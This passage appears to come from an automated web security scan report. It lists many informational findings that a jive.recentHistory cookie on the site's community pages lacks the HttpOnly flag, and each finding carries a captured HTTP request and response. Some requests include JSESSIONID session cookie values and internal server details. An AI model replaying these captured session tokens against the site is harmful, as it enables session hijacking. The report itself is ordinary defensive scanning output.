The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/businesspayments HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:17 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323134333b31342c323134353b31342c323034373b31342c323030353b31342c323034363b31342c323034353b31342c323034343b31342c323034333b31342c323133303b31342c323030343b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:18 GMT; Path=/
Vary: User-Agent
JP: D=142422 t=1313157077938365
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.11. https://www.x.com/community/ppx/button_manager

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/button_manager

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/button_manager HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: https://www.x.com/community/ppx/dev-tools
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.x.com
Connection: Keep-Alive
Cookie: JSESSIONID=7FE401956C0FCEA7A6B398FD70CFF9EB.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e25151d; jive.recentHistory.-1=31342c323030333b31342c323030353b31342c323030343b31342c323131343b31342c323237363b31342c323030383b3130322c333831313b332c323032353b332c32333938353b332c31303939373b332c323839313b332c33353136303b332c323430323b332c35333639373b332c39313330313b332c31323739393b332c3133313833303b

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:40:02 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323030373b31342c323030333b31342c323030353b31342c323030343b31342c323131343b31342c323237363b31342c323030383b3130322c333831313b332c323032353b332c32333938353b332c31303939373b332c323839313b332c33353136303b332c323430323b332c35333639373b332c39313330313b332c31323739393b332c3133313833303b; Expires=Sun, 11-Sep-2011 13:40:03 GMT; Path=/
Vary: User-Agent
JP: D=263918 t=1313156403269344
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.12. https://www.x.com/community/ppx/code_samples

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/code_samples

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/code_samples HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:05 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032353b31342c323032333b31342c323033343b31342c323036333b31342c323032343b31342c323036343b31342c323032323b31342c323033323b31342c323033373b31342c323033303b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:06 GMT; Path=/
Vary: User-Agent
JP: D=282830 t=1313157065903868
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.13. https://www.x.com/community/ppx/dev-tools

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/dev-tools

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/dev-tools HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: https://www.x.com/community/ppx/xspaces?view=documents
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.x.com
Connection: Keep-Alive
Cookie: JSESSIONID=7FE401956C0FCEA7A6B398FD70CFF9EB.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e25151d; jive.recentHistory.-1=31342c323030353b31342c323030343b31342c323131343b31342c323237363b31342c323030383b3130322c333831313b332c323032353b332c32333938353b332c31303939373b332c323839313b332c33353136303b332c323430323b332c35333639373b332c39313330313b332c31323739393b332c3133313833303b

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:39:59 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323030333b31342c323030353b31342c323030343b31342c323131343b31342c323237363b31342c323030383b3130322c333831313b332c323032353b332c32333938353b332c31303939373b332c323839313b332c33353136303b332c323430323b332c35333639373b332c39313330313b332c31323739393b332c3133313833303b; Expires=Sun, 11-Sep-2011 13:39:59 GMT; Path=/
Vary: User-Agent
JP: D=80199 t=1313156399568143
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.14. https://www.x.com/community/ppx/dev-tools/decision_tree

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/dev-tools/decision_tree

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/dev-tools/decision_tree HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:22 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323135343b31342c323131353b31342c323131313b31342c323232363b31342c323134393b31342c323038363b31342c323038323b31342c323030353b31342c323134343b31342c323134363b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:23 GMT; Path=/
Vary: User-Agent
JP: D=61135 t=1313157083274538
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.15. https://www.x.com/community/ppx/devchallenge

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/devchallenge

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/devchallenge HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:21 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323131353b31342c323038363b31342c323134393b31342c323131313b31342c323038323b31342c323030353b31342c323134343b31342c323134363b31342c323134323b31342c323134333b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:21 GMT; Path=/
Vary: User-Agent
JP: D=53170 t=1313157081752731
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.16. https://www.x.com/community/ppx/devchallenge/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/devchallenge/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/devchallenge/ HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:22 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323131353b31342c323131313b31342c323232363b31342c323134393b31342c323038363b31342c323038323b31342c323030353b31342c323134343b31342c323134363b31342c323134323b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:23 GMT; Path=/
Vary: User-Agent
JP: D=56010 t=1313157082994090
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.17. https://www.x.com/community/ppx/developer

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/developer

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/developer HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:23 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323037333b31342c323135343b31342c323131353b31342c323131313b31342c323232363b31342c323134393b31342c323038363b31342c323038323b31342c323030353b31342c323134343b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:23 GMT; Path=/
Vary: User-Agent
JP: D=127401 t=1313157083736368
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.18. https://www.x.com/community/ppx/devtalk

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/devtalk

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/devtalk HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:20 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323131313b31342c323134393b31342c323038323b31342c323131353b31342c323038363b31342c323030353b31342c323134343b31342c323134363b31342c323134323b31342c323134333b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:21 GMT; Path=/
Vary: User-Agent
JP: D=227171 t=1313157081321481
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.19. https://www.x.com/community/ppx/devzone

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/devzone

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/devzone HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:06 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323133333b31342c323032343b31342c323131343b31342c323033343b31342c323032353b31342c323036333b31342c323032333b31342c323036343b31342c323032323b31342c323033323b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:07 GMT; Path=/
Vary: User-Agent
JP: D=144424 t=1313157066963707
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.20. https://www.x.com/community/ppx/documentation

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/documentation

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/documentation HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:04 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032343b31342c323032323b31342c323036343b31342c323036333b31342c323033323b31342c323033373b31342c323033303b31342c323032393b31342c323032383b31342c323032373b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:04 GMT; Path=/
Vary: User-Agent
JP: D=195109 t=1313157064805423
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.21. https://www.x.com/community/ppx/ec

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/ec

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/ec HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: https://www.x.com/index.jspa
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.x.com
Connection: Keep-Alive
Cookie: JSESSIONID=7238D44EFB679CF81CE553C3866BE5EA.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e25151d

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 01:59:40 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323030383b; Expires=Sun, 11-Sep-2011 01:59:40 GMT; Path=/
Vary: User-Agent
JP: D=109211 t=1313114380657704
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.22. https://www.x.com/community/ppx/feedback

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/feedback

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/feedback HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:19 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323038363b31342c323038323b31342c323134323b31342c323030353b31342c323134343b31342c323134363b31342c323134333b31342c323134353b31342c323034373b31342c323034363b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:20 GMT; Path=/
Vary: User-Agent
JP: D=75997 t=1313157080027534
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.23. https://www.x.com/community/ppx/fundraising

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/fundraising

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/fundraising HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:17 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323134353b31342c323134323b31342c323030353b31342c323134333b31342c323034373b31342c323034363b31342c323034353b31342c323034343b31342c323034333b31342c323133303b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:18 GMT; Path=/
Vary: User-Agent
JP: D=83960 t=1313157078276262
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.24. https://www.x.com/community/ppx/global

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/global

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/global HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: https://www.x.com/community/ppx/showcase
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.x.com
Connection: Keep-Alive
Cookie: JSESSIONID=7FE401956C0FCEA7A6B398FD70CFF9EB.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e25151d; jive.recentHistory.-1=31342c323131343b31342c323237363b31342c323030383b332c35333735313b332c36303039313b332c3133363935343b332c3133383538323b332c3133373131353b

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:39:03 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323030343b31342c323131343b31342c323237363b31342c323030383b332c35333437343b332c35333735313b332c35333436333b332c38393433393b332c323030383b332c36303039313b332c3133363935343b332c3133383538323b332c3133373131353b; Expires=Sun, 11-Sep-2011 13:39:04 GMT; Path=/
Vary: User-Agent
JP: D=186175 t=1313156344173833
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.25. https://www.x.com/community/ppx/global/au

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/global/au

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/global/au HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:10 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323033393b31342c323030343b31342c323131343b31342c323133333b31342c323032353b31342c323033343b31342c323032333b31342c323032343b31342c323036333b31342c323036343b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:10 GMT; Path=/
Vary: User-Agent
JP: D=67754 t=1313157070067212
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.26. https://www.x.com/community/ppx/global/ca

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/global/ca

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/global/ca HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:10 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323034303b31342c323133313b31342c323030343b31342c323033393b31342c323131343b31342c323133333b31342c323032353b31342c323033343b31342c323032333b31342c323032343b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:10 GMT; Path=/
Vary: User-Agent
JP: D=100595 t=1313157070639699
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.27. https://www.x.com/community/ppx/global/cn

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/global/cn

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/global/cn HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:10 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323133313b31342c323030343b31342c323033393b31342c323034303b31342c323131343b31342c323133333b31342c323032353b31342c323033343b31342c323032333b31342c323032343b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:10 GMT; Path=/
Vary: User-Agent
JP: D=70307 t=1313157070898066
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.28. https://www.x.com/community/ppx/global/de

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/global/de

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/global/de HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:12 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323034323b31342c323133313b31342c323034313b31342c323034303b31342c323030343b31342c323033393b31342c323131343b31342c323133333b31342c323032353b31342c323033343b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:12 GMT; Path=/
Vary: User-Agent
JP: D=91052 t=1313157072186357
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.29. https://www.x.com/community/ppx/global/fr

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/global/fr

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/global/fr HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
